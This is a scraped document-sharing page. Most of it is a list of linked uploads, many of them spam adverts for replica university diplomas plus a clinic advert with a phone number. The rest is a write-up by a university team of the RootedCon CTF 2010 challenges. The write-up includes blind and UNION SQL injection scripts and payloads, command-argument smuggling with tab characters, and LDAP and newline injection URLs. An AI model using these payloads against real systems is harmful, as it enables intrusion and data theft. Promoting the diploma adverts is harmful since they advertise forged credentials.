一比一原版犹他大学毕业证如何办理一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理F
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.krishnachandrapal52
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样ayvbos
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理F
 
一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书F
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC
 
一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理AS
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdfMatthew Sinclair
 
Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...
Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...
Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...mikehavy0
 
一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样
一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样
一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样AS
 
A LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptx
A LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptxA LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptx
A LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptxthinamazinyo
 
一比一原版澳大利亚迪肯大学毕业证如何办理
一比一原版澳大利亚迪肯大学毕业证如何办理一比一原版澳大利亚迪肯大学毕业证如何办理
一比一原版澳大利亚迪肯大学毕业证如何办理SS
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrHenryBriggs2
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理F
 
一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书
一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书
一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书c6eb683559b3
 
[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformon
[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformon[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformon
[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformonhackersuli
 
Down bad crying at the gym t shirtsDown bad crying at the gym t shirts
Down bad crying at the gym t shirtsDown bad crying at the gym t shirtsDown bad crying at the gym t shirtsDown bad crying at the gym t shirts
Down bad crying at the gym t shirtsDown bad crying at the gym t shirtsrahman018755
 

Recently uploaded (20)

Loker Pemandu Lagu LC Semarang 085746015303
Loker Pemandu Lagu LC Semarang 085746015303Loker Pemandu Lagu LC Semarang 085746015303
Loker Pemandu Lagu LC Semarang 085746015303
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf
 
一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理
 
一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 
Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...
Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...
Abortion Clinic in Germiston +27791653574 WhatsApp Abortion Clinic Services i...
 
一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样
一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样
一比一原版(毕业证书)新西兰怀特克利夫艺术设计学院毕业证原件一模一样
 
A LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptx
A LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptxA LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptx
A LOOK INTO NETWORK TECHNOLOGIES MAINLY WAN.pptx
 
一比一原版澳大利亚迪肯大学毕业证如何办理
一比一原版澳大利亚迪肯大学毕业证如何办理一比一原版澳大利亚迪肯大学毕业证如何办理
一比一原版澳大利亚迪肯大学毕业证如何办理
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
 
一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书
一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书
一比一原版(NYU毕业证书)美国纽约大学毕业证学位证书
 
[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformon
[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformon[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformon
[Hackersuli] Élő szövet a fémvázon: Python és gépi tanulás a Zeek platformon
 
Down bad crying at the gym t shirtsDown bad crying at the gym t shirts
Down bad crying at the gym t shirtsDown bad crying at the gym t shirtsDown bad crying at the gym t shirtsDown bad crying at the gym t shirts
Down bad crying at the gym t shirtsDown bad crying at the gym t shirts
 

Rooted 2010 ppp

  • 1. RootedCon CTF 2010 Plaid Parliament of Pwning - Security Research Group at CMU October 11, 2010 1 Introduction This is a write-up for RootedCon CTF 2010 from Plaid Parliament of Pwning (PPP), Carnegie Mellon University’s Security Research Group. This write-up describes walk-throughs for all the challenges that we have completed during the competition. This report file will also be available at http://ppp.cylab.cmu.edu. 2 Walk-throughs Problem 1:getadmin This page appears to be just a normal page with no normal vulnerabilities. After staring at it for a while, we try to see if there are other files on the webserver that may give us some information. We soon stumble across the page index.php∼, this is a backup file created automatically when, for example, one edits a file in emacs. Reading this source code, we see that when the correct password is sent, the value is administrator gets set to 1. Further, as this php page emulates the actions of register globals, we can try to set this value ourselves. We can see that using post or get requests with the value are specifically filtered, but cookies are not. Set our cookie to contain the value is administrator=1, and then try submitting the form. Flag: t00easy f0r 31337 l1k3 y0u Problem 2:damn login It shows our browser name, so the theory is that it is looking this up in a database. If we throw a single-quote in the user-agent, we cause it to output nothing. It is then trivial, to implement a blind SQL attack. See below for our python script. Flag: Us3r4g3nt l34k3d s0 much 1nf0 Script: 1 #!/ usr/bin/python import string 3 import urllib2 5 target = ’user ()’ test = [] 7 search_space = list(string.lowercase) + list(string.uppercase) + [’@’, ’_’, ’0’, ’1’, ’2’, ’3’, ’4’, ’5’, ’6’, ’7’, ’8’, ’9’] 1
  • 2. 9 def runtest(req , ua): req.add_header(’User -Agent ’, ua % (’’.join(test))) 11 return ’Internet Explorer ’ in urllib2.urlopen(req).read () 13 #ua = "1’,( select /**/ count(TABLE_NAME)/**/ from /**/ information_schema .tables /**/ where /**/( TABLE_SCHEMA /**/ like /**/’ damn_login ’)*( TABLE_NAME /**/ like /**/ ’%s’) like ’1’));#" #ua = "1’,( select /**/ count(TABLE_NAME)/**/ from /**/ information_schema .columns /**/ where /**/( TABLE_NAME /**/ like /**/’ secretpass ’)*( COLUMN_NAME /**/ like /**/ ’%s’)like ’1’));#" 15 ua = "1’,( select /**/ count(pwd)/**/ from /**/ SecretPass /**/ where /**/ binary(pwd)/**/ like /**/ ’%s’));#" 17 req = urllib2.Request(’http :// ctf.rs -labs.com :85/ damn_login_82c5feb95ba26418a402506311c99c7a /’, ’pass=test ’) 19 # get length 21 length = 0 while True: 23 print ’Trying: %s’ % ’’.join(test) if runtest(req , ua): 25 length = len(test) break 27 test.append(’_’) 29 for i in xrange(length): done = False 31 for j in search_space: test[i] = j 33 print ’Trying: %s’ % ’’.join(test) if runtest(req , ua): 35 done = True break 37 if not done: print ’Stopped at ’ + ’’.join(test) 39 break Problem 3:fortune We can see that this webpage simply runs the unix program fortune with whichever arguments are given as the fortune parameter. Many of the special characters that we would want to use to either run arbitrary commands or pass more than one parameter at a time to the fortune program are specifically blocked, giving the error message “Hacking attempt! (non-allowed chars)”. However, after trying many characters, we learn that the tab character (value 0x09) is allowed! This let’s us pass multiple arguments to the fortune program. We submit fortune=-f%09fortunes%2F (where fortunes/ is the folder containing our fortune files) to get a listing of all the files in this folder. The file named key-8b2f0453df4597c4e3cd92215bd2000e immediately sticks out, so we view it by sending fortune=fortunes%2Fkey-8b2f0453df4597c4e3cd92215bd2000e. Flag: Y0u 4r3 m0re lucky th4n y0u th0ught 2
  • 3. Problem 4:oneweb This problems tells us to read 0fdd8fd4233f8a226ff5a4fe87eee080.html for more instruc- tions. Sadly, upon going there, we see another site that tells us to now go to 415b4dd20fbf84f57ecd9067d46cfd25. Quickly we realize that we are going to need to repeat this process quite a few times, so we quickly create a script using perl. #!/ usr/bin/perl 2 $result = " dc001aeff6413933fa39ce2274c4e7f1 .html "; 4 while ($result =~ m/(w+. html)/) { $result = ‘curl http :// ctf.rs -labs.com :84/ oneweb_e04932f0613ba8c4ecadb225d929fd13 /$1 2>/dev/null ‘; 6 } print $result; Flag: t00 t1r3d f0r th1S 0N3 Problem 5:weblist We see a list of animals and numbers. If we type in one of the numbers, we get the corresponding animal. We can seperate multiple numbers using a space. This is probably be implemented by replacing a space with a comma and the number is sur- rounded by double-quotes, and then throwing into a sql query of the form: ’select id, name from table where id in (...)’. Using this we can start with a blind sql attack to get the schema. Once we have the schema, we can use a union query to get the rest of the information. Flag: cH4nG3d t0 fUcK k4cH4K1l Unions: 1 2") union(select(TABLE_NAME) ,(COLUMN_NAME) ,(1) from( information_schema .columns)) union /**/ select(wl.id) ,(wld.list_id) ,(3) from (( select(id)from(WebList))wl ,( select(list_id)from(WebListDescr))wld)having ("a 3 2") union(select( login_3e1ce4bce9a68db1a1c576d1f76e5aa6 ) ,( password_3e1ce4bce9a666b1a1c576d1f76e5aa6 ) ,(1) from( UserPassword_55cf9c78f77986669bc362385cb55f97 ))union /**/ select(wl.id) ,(wld. list_id) ,(3) from (( select(id)from(WebList))wl ,( select(list_id)from(WebListDescr) )wld)having ("a Blind SQL: 1 #!/ usr/bin/perl 3 foobar (""); #foobar (""); 5 sub foobar { 7 my $prefix = pop(@_); 9 my $i = length($prefix)+1; 11 for my $s (32..122) { 13 $s = chr($s); if($s eq ".") { 3
  • 4. 15 next; } 17 if($i > 4) { next; 19 } 21 ($string = $prefix.$s) =~ s/(.)/sprintf ("%x",ord($1))/eg; my $result = ‘curl "http :// ctf.rs -labs.com :83/ weblist_85baaaf3d4593fcbaeb3878c0357cfd4 /? list =2" , exists(select( concat_ws ("." , TABLE_NAME ,COLUMN_NAME))a/**/ from( information_schema . columns)having(field(binary(substring(a,1,$i)) ,0x$string))) ,"2" 2>/dev/ null ‘; 23 # my $result = ‘curl "http :// ctf.rs -labs.com :83/ weblist_85baaaf3d4593fcbaeb3878c0357cfd4 /? list =2" , exists(select(concat_ws ("." , password))a/**/ from(UserPassword)having(field(binary(substring(a,1, $i)) ,0x$string))) ,"2" 2>/dev/null ‘; 25 if ($result =~ m/perro/ig && $i < 20) { print "n*** $prefix$sn"; 27 foobar($prefix.$s); } 29 } } Problem 6:shop The goal of this problem was to buy an expensive item that would give you the key. After registering and logging on, we notice that we can see, search, and buy products. We also notice that we start with 100 cash and there is no way to increase our cash. When we click ”SEE PRODUCTS” (expensive) we notice that there is a ’>=36’ in the url. By changing this to ‘<=0’, we can see all of the products. This gives us the first hint: “If I were you, I’d try to activate DEBUG mode”. So, if we append ‘&debug=1’ to the URL, we see the raw output of the query. This also tells us that it is an LDAP injection problem. Now, we try to get all of the objects in the LDAP directory, not just products. To do this requires us to negate the requirement: ’ctfPrice <= ...’. Luckily for us, using the search feature, we can inject text both before and after that requirement. This allows us to negate it. The url would look something like: http :// ctf.rs -labs.com :82/ shop_c8f828cc0374f4b1e2187599055ecde2 /?op=busqueda& nombre =*%29%28!%28|%28 ctfPrice %3d1&tipo =%3E%3D36 %29%29& Submit=FIND&debug =1 And now, we get the second hint: You nearly got it. Only one step is missing... Look for ways to increase your cash. Tip3: I am calling ldapadd cmd util from code So, this gives the format of user objects. Since ldapadd treats newlines as delimiters for at- tributes, if we put a newline followed by ’ctfCash: 31337’ we will have enough money to buy the item. For example: 1 http :// ctf.rs -labs.com :82/ shop_c8f828cc0374f4b1e2187599055ecde2 /?op=registro&subop =procesar&username=ppp3&clearpassword=ppp3&nombrecompleto =1%0 ActfCash :%2031337& tlf=ppp2&Submit=Send 4
  • 5. Now, we buy the item and we get the key: Flag: LD4p 1nj3ct10N rlZzzz Problem 7:scriptures Viewing the source of this page we see a horrible mess of packed javascript. Luckily we recognize this as packed with the popular javascript compressor found at http://dean.edwards.name/packer/, which also handles unpacking (we leave enabling the decode button as an exercise for the reader). Rather than trying to reverse the javascript, we can observe that the cp function does the actual comparison for the password, so we modify it from comparing strings to simply displaying an alert box with the string to which our input is compared. We enter the modified function 1 javascript:function cp(tspaQc3) {var DZr4 = "x6ex6bx75x33x69x75x6ex32x78 x75x32x7a";var d5 = ""; for (i = 0; i < DZr4 [" x6cx65x6ex67x74x68 "]; i++) {d5 += window [" x53x74x72x69x6ex67 "][" x66x72x6fx6dx43x68x61x72 x43x6fx64x65 "](( DZr4 [" x63x68x61x72x43x6fx64x65x41x74 "](i) - (5 * i ) % 3) % 256)}alert (r(d5));};cp(); in the address bar, to automagically print out our key. Flag: y0uw0ntg3tin 3 Acknowledgement As always we thank Professor David Brumley for the guidance and the support. 5